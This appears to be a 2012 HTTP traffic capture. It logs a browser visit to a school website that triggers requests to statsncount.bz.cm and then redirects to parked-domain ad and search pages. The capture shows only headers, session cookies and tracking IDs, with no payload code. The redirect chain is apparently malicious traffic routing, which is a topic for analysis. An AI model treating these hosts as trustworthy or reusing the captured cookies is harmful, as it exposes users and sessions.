GET /apps/domainpark/domainpark.cgi?api=2&callback=_google_json_callback&output=js&adtest=off&client=dp-nameadmin22_3ph_js&channel=000106&hl=en&num_ads=0&num_radlinks=10&optimize_terms=on&categories=off&feed=afs&domain_name=www.information.com&dt=1352165283405&u_tz=60&u_his=2&u_h=885&u_w=1176&frm=1&ref=http%3A%2F%2Fwww.information.com%2F HTTP/1.1 Host: googleads.g.doubleclick.net GET /apps/domainpark/domainpark.cgi?api=2&callback=_google_json_callback&output=js&adtest=off&client=dp-nameadmin22_3ph_js&channel=000106&hl=en&num_ads=0&num_radlinks=10&optimize_terms=on&categories=off&feed=afs&domain_name=www.information.com&dt=1352165283405&u_tz=60&u_his=2&u_h=885&u_w=1176&frm=1&ref=http%3A%2F%2Fwww.information.com%2F HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159 Cookie: id=223ae1776901005b\|\|t=1350343758\|et=730\|cs=002213fd480aa30e9cef2f5d42	HTTP/1.1 200 OK Content-Type: application/javascript; charset=UTF-8 Content-Disposition: inline P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" X-Content-Type-Options: nosniff Content-Encoding: gzip Date: Tue, 06 Nov 2012 01:28:04 GMT Server: domainserver Cache-Control: private Content-Length: 1383 X-XSS-Protection: 1; mode=block
GET /images/star_24.gif HTTP/1.1 Host: 208.87.32.71 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: image/gif Server: nginx/0.8.54 Date: Tue, 06 Nov 2012 01:25:31 GMT Content-Length: 1312 Last-Modified: Fri, 06 Jan 2012 17:17:39 GMT Connection: close Accept-Ranges: bytes
GET /favicon.ico HTTP/1.1 Host: www.information.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: image/x-icon Date: Tue, 06 Nov 2012 01:28:04 GMT Server: Apache/2.2.20 (Ubuntu) Last-Modified: Fri, 17 Aug 2012 19:42:54 GMT Etag: "1700c62-0-4c77b5db6ab80" Accept-Ranges: bytes Content-Length: 0 Connection: close
GET /favicon.ico HTTP/1.1 Host: lowndesacademy.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: BX=7153s1t89gpsl&b=3&s=9q	HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Date: Tue, 06 Nov 2012 01:28:02 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Age: 0 Connection: close Server: YTS/1.19.11
GET /statistic.htm HTTP/1.1 Host: co-stats.co.be User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html
GET /favicon.ico HTTP/1.1 Host: lowndesacademy.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: BX=7153s1t89gpsl&b=3&s=9q
GET /statistic.htm HTTP/1.1 Host: co-stats.co.be User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html
GET /includes/images/main-bg.jpg HTTP/1.1 Host: www.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive
GET /includes/images/inside-logo.png HTTP/1.1 Host: www.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive
GET /banners/spacer.gif HTTP/1.1 Host: www.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive
GET /images/ultra.gif HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache Last-Modified: Wed, 08 Jun 2011 20:32:45 GMT Etag: "581c250-4b01-4a5393d2e3540" Accept-Ranges: bytes Content-Length: 19201 Connection: close
GET /images/geary1.gif HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache Last-Modified: Wed, 08 Jun 2011 20:40:47 GMT Etag: "581c251-37d2-4a53959e8f1c0" Accept-Ranges: bytes Content-Length: 14290 Connection: close
GET /images/workfromhome.gif HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache Last-Modified: Thu, 09 Jun 2011 00:22:08 GMT Etag: "581c252-53c4-4a53c7184ec00" Accept-Ranges: bytes Content-Length: 21444 Connection: close
GET /images/lotto.gif HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive
GET /images/autowealth.jpg HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive
GET /images/energy.gif HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/ads.php?message=inactive
GET /ads.php?message=inactive HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/in.cgi?16

Request	Response
GET /boxtop.html HTTP/1.1 Host: lowndesacademy.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:49 GMT Set-Cookie: BX=7153s1t89gpsl&b=3&s=9q; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.lowndesacademy.org P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Host: p10w11.geo.gq1.yahoo.com X-INKT-URI: http://www.lowndesacademy.org//boxtop.html X-INKT-SITE: http://www.lowndesacademy.org Last-Modified: Fri, 23 Dec 2011 13:56:51 GMT Accept-Ranges: bytes Content-Length: 25036 Age: 0 Connection: close Server: YTS/1.19.11
GET /css/styles.css HTTP/1.1 Host: lowndesacademy.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html Cookie: BX=7153s1t89gpsl&b=3&s=9q	HTTP/1.1 200 OK Content-Type: text/css Date: Tue, 06 Nov 2012 01:27:50 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Sat, 25 Aug 2007 04:36:47 GMT Accept-Ranges: bytes Content-Length: 2011 Age: 0 Connection: close Server: YTS/1.19.11
GET /images/latitle1.gif HTTP/1.1 Host: lowndesacademy.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html Cookie: BX=7153s1t89gpsl&b=3&s=9q	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 01:27:50 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: max-age=864000 Expires: Fri, 16 Nov 2012 01:27:50 GMT Last-Modified: Sat, 25 Aug 2007 04:42:13 GMT Accept-Ranges: bytes Content-Length: 16655 Age: 0 Connection: close Server: YTS/1.19.11
GET /d/lib/smb/js/hosting/cp/js_source/whv2_001.js HTTP/1.1 Host: l.yimg.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html	HTTP/1.1 200 OK Content-Type: application/javascript Date: Mon, 05 Nov 2012 21:05:07 GMT Cache-Control: max-age=315360000 Expires: Thu, 03 Nov 2022 21:05:07 GMT Last-Modified: Tue, 29 Jan 2008 00:17:28 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Age: 15763 Content-Length: 380 Connection: keep-alive Server: ATS/3.2.0
GET /downloads/sept09boxtop1.jpg HTTP/1.1 Host: lowndesacademy.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html Cookie: BX=7153s1t89gpsl&b=3&s=9q	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Tue, 06 Nov 2012 01:27:50 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: max-age=864000 Expires: Fri, 16 Nov 2012 01:27:50 GMT Last-Modified: Wed, 30 Sep 2009 21:13:27 GMT Accept-Ranges: bytes Content-Length: 52874 Age: 0 Connection: close Server: YTS/1.19.11
GET /visit.gif?&r=&b=Netscape%205.0%20%28Windows%3B%20en-US%29&s=1176x885&o=Win32&c=24&j=true&v=1.2 HTTP/1.1 Host: visit.webhosting.yahoo.com GET /visit.gif?&r=&b=Netscape%205.0%20%28Windows%3B%20en-US%29&s=1176x885&o=Win32&c=24&j=true&v=1.2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html	HTTP/1.0 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 01:27:51 GMT Pragma: no-cache Connection: close Cache-Control: max-age=0 Expires: Tue, 06 Nov 2012 01:27:51 GMT Content-Length: 85
GET /images/banner_bg.jpg HTTP/1.1 Host: lowndesacademy.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/css/styles.css Cookie: BX=7153s1t89gpsl&b=3&s=9q	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Tue, 06 Nov 2012 01:27:50 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: max-age=864000 Expires: Fri, 16 Nov 2012 01:27:50 GMT Last-Modified: Thu, 06 Aug 2009 14:45:58 GMT Accept-Ranges: bytes Content-Length: 48688 Age: 0 Connection: close Server: YTS/1.19.11
GET /in.cgi?16 HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache Content-Length: 836 Connection: close
GET /?o_id=164324&domainname=statsncount-bz.cm HTTP/1.1 Host: searchportal.information.com GET /?o_id=164324&domainname=statsncount-bz.cm HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/in.cgi?16	HTTP/1.1 302 Found Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Set-Cookie: uid=searchportal5098679f2e1f54.80761407; expires=Thu, 06-Dec-2012 01:27:59 GMT WEBUK=WUK06; path=/ Location: http://www.information.com Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 20 Connection: close
GET /ads.php?message=inactive HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/in.cgi?16	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache Content-Length: 2710 Connection: close
GET /in.cgi?16 HTTP/1.1 Host: statsncount.bz.cm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://lowndesacademy.org/boxtop.html	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache Content-Length: 836 Connection: close
GET / HTTP/1.1 Host: www.information.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/in.cgi?16	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Set-Cookie: uid=www5098679f514358.53487159; expires=Thu, 06-Dec-2012 01:27:59 GMT WEBUK=WUK09; path=/ Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 580 Connection: close
GET /?o_id=164324&domainname=statsncount-bz.cm HTTP/1.1 Host: searchportal.information.com GET /?o_id=164324&domainname=statsncount-bz.cm HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://statsncount.bz.cm/in.cgi?16 Cookie: uid=searchportal5098679f2e1f54.80761407; WEBUK=WUK06	HTTP/1.1 302 Found Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Set-Cookie: uid=searchportal5098679f2e1f54.80761407; expires=Thu, 06-Dec-2012 01:27:59 GMT Location: http://www.information.com Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 20 Connection: close
GET /?redir=frame&uid=www5098679f514358.53487159 HTTP/1.1 Host: www.information.com GET /?redir=frame&uid=www5098679f514358.53487159 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/ Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Set-Cookie: uid=www5098679f514358.53487159; expires=Thu, 06-Dec-2012 01:27:59 GMT Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 520 Connection: close
GET /return_js.php?d=information.com&s=1352165279 HTTP/1.1 Host: return.uk.domainnamesales.com GET /return_js.php?d=information.com&s=1352165279 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/?redir=frame&uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: application/javascript Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 51 Connection: close Set-Cookie: WEBUK=WUK06; path=/
GET /tg.php?uid=www5098679f514358.53487159 HTTP/1.1 Host: www.information.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/?redir=frame&uid=www5098679f514358.53487159 Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 270 Connection: close
GET /page.php?www5098679f514358.53487159 HTTP/1.1 Host: www.information.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/?redir=frame&uid=www5098679f514358.53487159 Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 159 Connection: close
GET /search.php?uid=www5098679f514358.53487159 HTTP/1.1 Host: www.information.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/?redir=frame&uid=www5098679f514358.53487159 Cookie: uid=www5098679f514358.53487159; WEBUK=WUK09	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 01:27:59 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.9 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3800 Connection: close
GET /apps/domainpark/show_afd_ads.js HTTP/1.1 Host: pagead2.googlesyndication.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.information.com/search.php?uid=www5098679f514358.53487159	HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Last-Modified: Wed, 31 Oct 2012 23:10:23 GMT Date: Mon, 05 Nov 2012 02:00:17 GMT Expires: Tue, 06 Nov 2012 02:00:17 GMT X-Content-Type-Options: nosniff Content-Disposition: attachment Server: domainserver X-XSS-Protection: 1; mode=block Content-Encoding: gzip Content-Length: 1932 Age: 84463 Cache-Control: public, max-age=86400
